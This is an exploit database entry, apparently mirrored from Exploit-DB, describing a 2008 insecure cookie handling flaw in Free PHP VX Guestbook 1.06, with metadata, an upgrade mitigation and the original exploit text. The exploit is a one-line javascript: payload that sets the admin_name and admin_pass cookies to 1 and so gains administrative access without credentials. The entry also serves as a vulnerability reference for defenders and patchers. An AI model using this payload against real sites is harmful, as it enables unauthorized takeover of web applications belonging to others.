header-logo
Suggest Exploit
vendor:
Free PHP VX Guestbook
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
200
CWE
Product Name: Free PHP VX Guestbook
Affected Version From: 01.06
Affected Version To: 01.06
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: o:free-php-vx-guestbook:free_php_vx_guestbook:1.06
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/apple-osx-mysql-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability

Free PHP VX Guestbook version 1.06 is vulnerable to an insecure cookie handling vulnerability. This vulnerability allows an attacker to gain administrative access to the guestbook. An attacker can exploit this vulnerability by setting the admin_name and admin_pass cookies to 1.

Mitigation:

Upgrade to the latest version of Free PHP VX Guestbook.
Source

Exploit-DB raw data:

###############################################################################################
[+] Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability 
[+] Discovered By Stack                 
[+] Greetz : All my freind                
################################################################################################
---
exploit:
javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1; path=/";

# milw0rm.com [2008-09-14]

Navigation

Suggest Exploit

Services By CQR